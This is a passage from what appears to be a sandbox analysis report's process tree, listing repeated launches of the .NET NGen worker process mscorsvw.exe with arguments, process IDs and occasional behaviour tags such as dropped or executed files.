  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 204 -InterruptEvent 198 -NGENProcess 184 -Pipe 1f4 -Comment "NGen Worker Process"
  2⤵
  PID:1824
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 198 -InterruptEvent 184 -NGENProcess 14c -Pipe 21c -Comment "NGen Worker Process"
  2⤵
  PID:884
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1e8 -InterruptEvent 1fc -NGENProcess 220 -Pipe 198 -Comment "NGen Worker Process"
  2⤵
  PID:1528
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 188 -InterruptEvent 1fc -NGENProcess 1e8 -Pipe 14c -Comment "NGen Worker Process"
  2⤵
  PID:2092
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1fc -InterruptEvent 188 -NGENProcess 220 -Pipe 224 -Comment "NGen Worker Process"
  2⤵
  PID:2252
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 188 -InterruptEvent 210 -NGENProcess 1a0 -Pipe 204 -Comment "NGen Worker Process"
  2⤵
  PID:2972
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 210 -InterruptEvent 1a0 -NGENProcess 1fc -Pipe 1e8 -Comment "NGen Worker Process"
  2⤵
  PID:1220
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 230 -InterruptEvent 1a0 -NGENProcess 210 -Pipe 220 -Comment "NGen Worker Process"
  2⤵
  PID:2600
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1a0 -InterruptEvent 210 -NGENProcess 188 -Pipe 1fc -Comment "NGen Worker Process"
  2⤵
  PID:2536
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 210 -InterruptEvent 238 -NGENProcess 184 -Pipe 218 -Comment "NGen Worker Process"
  2⤵
  PID:2516
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 238 -InterruptEvent 184 -NGENProcess 1a0 -Pipe 190 -Comment "NGen Worker Process"
  2⤵
  PID:2520
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 184 -InterruptEvent 210 -NGENProcess 188 -Pipe 244 -Comment "NGen Worker Process"
  2⤵
  PID:2096
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 230 -InterruptEvent 238 -NGENProcess 248 -Pipe 184 -Comment "NGen Worker Process"
  2⤵
  PID:2972
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 238 -InterruptEvent 218 -NGENProcess 188 -Pipe 22c -Comment "NGen Worker Process"
  2⤵
  PID:1824
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 24c -InterruptEvent 230 -NGENProcess 250 -Pipe 238 -Comment "NGen Worker Process"
  2⤵
  PID:2224
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 230 -InterruptEvent 23c -NGENProcess 188 -Pipe 234 -Comment "NGen Worker Process"
  2⤵
  PID:996
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 23c -InterruptEvent 230 -NGENProcess 218 -Pipe 210 -Comment "NGen Worker Process"
  2⤵
  PID:1528
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 230 -InterruptEvent 1a0 -NGENProcess 254 -Pipe 240 -Comment "NGen Worker Process"
  2⤵
  PID:436
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1a0 -InterruptEvent 230 -NGENProcess 188 -Pipe 258 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:976
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 230 -InterruptEvent 248 -NGENProcess 25c -Pipe 24c -Comment "NGen Worker Process"
  2⤵
  PID:1872
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 248 -InterruptEvent 25c -NGENProcess 1a0 -Pipe 254 -Comment "NGen Worker Process"
  2⤵
  PID:2684
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 25c -InterruptEvent 268 -NGENProcess 188 -Pipe 23c -Comment "NGen Worker Process"
  2⤵
  PID:2688
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 268 -InterruptEvent 188 -NGENProcess 248 -Pipe 264 -Comment "NGen Worker Process"
  2⤵
  PID:972
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 188 -InterruptEvent 270 -NGENProcess 1a0 -Pipe 230 -Comment "NGen Worker Process"
  2⤵
  PID:996
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 274 -InterruptEvent 268 -NGENProcess 278 -Pipe 188 -Comment "NGen Worker Process"
  2⤵
  PID:2516
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 268 -InterruptEvent 278 -NGENProcess 260 -Pipe 27c -Comment "NGen Worker Process"
  2⤵
  PID:2464
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 278 -InterruptEvent 260 -NGENProcess 26c -Pipe 250 -Comment "NGen Worker Process"
  2⤵
  PID:2380
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 280 -InterruptEvent 260 -NGENProcess 278 -Pipe 274 -Comment "NGen Worker Process"
  2⤵
  PID:2740
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 260 -InterruptEvent 280 -NGENProcess 26c -Pipe 284 -Comment "NGen Worker Process"
  2⤵
  PID:1916
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 280 -InterruptEvent 26c -NGENProcess 268 -Pipe 28c -Comment "NGen Worker Process"
  2⤵
  PID:1744
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 26c -InterruptEvent 280 -NGENProcess 1a0 -Pipe 248 -Comment "NGen Worker Process"
  2⤵
  PID:2332
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 260 -InterruptEvent 270 -NGENProcess 25c -Pipe 1a0 -Comment "NGen Worker Process"
  2⤵
  PID:280
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 270 -InterruptEvent 2a0 -NGENProcess 278 -Pipe 29c -Comment "NGen Worker Process"
  2⤵
  PID:240
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a0 -InterruptEvent 2a4 -NGENProcess 268 -Pipe 218 -Comment "NGen Worker Process"
  2⤵
  PID:2912
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a4 -InterruptEvent 268 -NGENProcess 260 -Pipe 2ac -Comment "NGen Worker Process"
  2⤵
  PID:2680
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 268 -InterruptEvent 288 -NGENProcess 2a8 -Pipe 290 -Comment "NGen Worker Process"
  2⤵
  PID:1708
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a8 -InterruptEvent 2b0 -NGENProcess 268 -Pipe 2b4 -Comment "NGen Worker Process"
  2⤵
  PID:2160
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b0 -InterruptEvent 268 -NGENProcess 288 -Pipe 278 -Comment "NGen Worker Process"
  2⤵
  PID:1528
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 268 -InterruptEvent 2a8 -NGENProcess 2a0 -Pipe 2c0 -Comment "NGen Worker Process"
  2⤵
  PID:2652
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a8 -InterruptEvent 2a0 -NGENProcess 2b0 -Pipe 2bc -Comment "NGen Worker Process"
  2⤵
  PID:2464
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a0 -InterruptEvent 270 -NGENProcess 260 -Pipe 25c -Comment "NGen Worker Process"
  2⤵
  PID:2328
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 270 -InterruptEvent 2c8 -NGENProcess 298 -Pipe 2b8 -Comment "NGen Worker Process"
  2⤵
  PID:1972
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c8 -InterruptEvent 2cc -NGENProcess 2b0 -Pipe 268 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:1872
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2cc -InterruptEvent 2d0 -NGENProcess 260 -Pipe 2c4 -Comment "NGen Worker Process"
  2⤵
  PID:560
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d0 -InterruptEvent 2d4 -NGENProcess 298 -Pipe 2a8 -Comment "NGen Worker Process"
  2⤵
  PID:2548
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d8 -InterruptEvent 2d4 -NGENProcess 2d0 -Pipe 2b0 -Comment "NGen Worker Process"
  2⤵
  PID:2832
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d4 -InterruptEvent 2a0 -NGENProcess 2c8 -Pipe 2dc -Comment "NGen Worker Process"
  2⤵
  PID:2448
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a4 -InterruptEvent a0 -NGENProcess 2a0 -Pipe 2e0 -Comment "NGen Worker Process"
  2⤵
  PID:2940
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 27c -InterruptEvent 188 -NGENProcess 274 -Pipe 250 -Comment "NGen Worker Process"
  2⤵
  PID:1224
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 240 -InterruptEvent 188 -NGENProcess 27c -Pipe 23c -Comment "NGen Worker Process"
  2⤵
  PID:1784
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 274 -InterruptEvent 258 -NGENProcess 210 -Pipe 240 -Comment "NGen Worker Process"
  2⤵
  PID:1076
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 24c -InterruptEvent 28c -NGENProcess 254 -Pipe 274 -Comment "NGen Worker Process"
  2⤵
  PID:2688
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 284 -InterruptEvent 28c -NGENProcess 24c -Pipe 210 -Comment "NGen Worker Process"
  2⤵
  PID:896
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 27c -InterruptEvent 188 -NGENProcess 22c -Pipe 284 -Comment "NGen Worker Process"
  2⤵
  PID:1588
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 188 -InterruptEvent 264 -NGENProcess 24c -Pipe 234 -Comment "NGen Worker Process"
  2⤵
  PID:280
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 184 -InterruptEvent 27c -NGENProcess 244 -Pipe 188 -Comment "NGen Worker Process"
  2⤵
  PID:1828
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 27c -InterruptEvent 254 -NGENProcess 24c -Pipe 190 -Comment "NGen Worker Process"
  2⤵
  PID:996
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 238 -InterruptEvent 254 -NGENProcess 27c -Pipe 258 -Comment "NGen Worker Process"
  2⤵
  PID:1644
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 230 -InterruptEvent 254 -NGENProcess 238 -Pipe 24c -Comment "NGen Worker Process"
  2⤵
  PID:2640
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 254 -InterruptEvent 238 -NGENProcess 1fc -Pipe 220 -Comment "NGen Worker Process"
  2⤵
  PID:2328
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 238 -InterruptEvent 1fc -NGENProcess 27c -Pipe 1e8 -Comment "NGen Worker Process"
  2⤵
  PID:2376
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 244 -InterruptEvent 1fc -NGENProcess 238 -Pipe 264 -Comment "NGen Worker Process"
  2⤵
  PID:2012
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1fc -InterruptEvent 184 -NGENProcess 27c -Pipe 28c -Comment "NGen Worker Process"
  2⤵
  PID:2740
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 184 -InterruptEvent 27c -NGENProcess 244 -Pipe 228 -Comment "NGen Worker Process"
  2⤵
  PID:1784
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 27c -InterruptEvent 198 -NGENProcess 254 -Pipe 230 -Comment "NGen Worker Process"
  2⤵
  - Drops file in Windows directory
  PID:2284
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 21c -InterruptEvent 184 -NGENProcess 1f4 -Pipe 27c -Comment "NGen Worker Process"
  2⤵
  PID:972
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 184 -InterruptEvent 238 -NGENProcess 254 -Pipe 22c -Comment "NGen Worker Process"
  2⤵
  PID:1972
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 238 -InterruptEvent 1e4 -NGENProcess 198 -Pipe 214 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:2672
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 204 -InterruptEvent 1e4 -NGENProcess 238 -Pipe 244 -Comment "NGen Worker Process"
  2⤵
  PID:1732
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1f4 -InterruptEvent 21c -NGENProcess 208 -Pipe 204 -Comment "NGen Worker Process"
  2⤵
  PID:1664
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 21c -InterruptEvent 208 -NGENProcess 1f8 -Pipe 1c4 -Comment "NGen Worker Process"
  2⤵
  PID:2228
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 254 -InterruptEvent 198 -NGENProcess 9c -Pipe 21c -Comment "NGen Worker Process"
  2⤵
  PID:2560
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 14c -InterruptEvent 198 -NGENProcess 254 -Pipe 1f8 -Comment "NGen Worker Process"
  2⤵
  PID:2872
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 184 -InterruptEvent 198 -NGENProcess 14c -Pipe 9c -Comment "NGen Worker Process"
  2⤵
  PID:2428
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 198 -InterruptEvent 1e4 -NGENProcess 254 -Pipe 1f4 -Comment "NGen Worker Process"
  2⤵
  PID:2848
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2cc -InterruptEvent 1e4 -NGENProcess 198 -Pipe 238 -Comment "NGen Worker Process"
  2⤵
  PID:2296
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1e4 -InterruptEvent 208 -NGENProcess 254 -Pipe 2d0 -Comment "NGen Worker Process"
  2⤵
  PID:2644
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d8 -InterruptEvent 2cc -NGENProcess 270 -Pipe 1e4 -Comment "NGen Worker Process"
  2⤵
  PID:1944
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 224 -InterruptEvent 2cc -NGENProcess 2d8 -Pipe 254 -Comment "NGen Worker Process"
  2⤵
  PID:2768
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent a0 -InterruptEvent 2a4 -NGENProcess 298 -Pipe 224 -Comment "NGen Worker Process"
  2⤵
  PID:2160
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a4 -InterruptEvent 298 -NGENProcess 2a0 -Pipe 2d4 -Comment "NGen Worker Process"
  2⤵
  PID:1916
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 298 -InterruptEvent 198 -NGENProcess 14c -Pipe 208 -Comment "NGen Worker Process"
  2⤵
  PID:1508
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 198 -InterruptEvent 2e4 -NGENProcess a0 -Pipe 184 -Comment "NGen Worker Process"
  2⤵
  PID:2328
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c8 -InterruptEvent 298 -NGENProcess 260 -Pipe 198 -Comment "NGen Worker Process"
  2⤵
  PID:2740
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 298 -InterruptEvent 2d8 -NGENProcess a0 -Pipe 270 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:268
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 288 -InterruptEvent 2d8 -NGENProcess 298 -Pipe 2e4 -Comment "NGen Worker Process"
  2⤵
  PID:2168
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d8 -InterruptEvent 298 -NGENProcess 2e8 -Pipe 2ec -Comment "NGen Worker Process"
  2⤵
  PID:2336
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a4 -InterruptEvent 298 -NGENProcess 2d8 -Pipe 2cc -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:1124
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 14c -InterruptEvent 298 -NGENProcess 2a4 -Pipe 2e8 -Comment "NGen Worker Process"
  2⤵
  PID:2376
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 260 -InterruptEvent 2f0 -NGENProcess 2f8 -Pipe 14c -Comment "NGen Worker Process"
  2⤵
  PID:944
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2f0 -InterruptEvent 2f8 -NGENProcess 2f4 -Pipe 2fc -Comment "NGen Worker Process"
  2⤵
  PID:1056
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2f8 -InterruptEvent 2f4 -NGENProcess 2a4 -Pipe 300 -Comment "NGen Worker Process"
  2⤵
  PID:2588
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a0 -InterruptEvent 2f4 -NGENProcess 2f8 -Pipe 288 -Comment "NGen Worker Process"
  2⤵
  PID:2404
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2f4 -InterruptEvent 2f8 -NGENProcess 304 -Pipe 308 -Comment "NGen Worker Process"
  2⤵
  PID:2888
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 298 -InterruptEvent 2c8 -NGENProcess 30c -Pipe 2f4 -Comment "NGen Worker Process"
  2⤵
  PID:2296
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c8 -InterruptEvent 260 -NGENProcess 304 -Pipe 2f0 -Comment "NGen Worker Process"
  2⤵
  PID:2872
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 260 -InterruptEvent 2c8 -NGENProcess 2f8 -Pipe a0 -Comment "NGen Worker Process"
  2⤵
  PID:2624
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 25c -InterruptEvent 2a8 -NGENProcess 2c4 -Pipe 2b8 -Comment "NGen Worker Process"
  2⤵
  PID:2844
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2ac -InterruptEvent 268 -NGENProcess 218 -Pipe 2dc -Comment "NGen Worker Process"
  2⤵
  PID:1176
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 268 -InterruptEvent 218 -NGENProcess 2b0 -Pipe 29c -Comment "NGen Worker Process"
  2⤵
  PID:1784
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 278 -InterruptEvent 218 -NGENProcess 268 -Pipe 290 -Comment "NGen Worker Process"
  2⤵
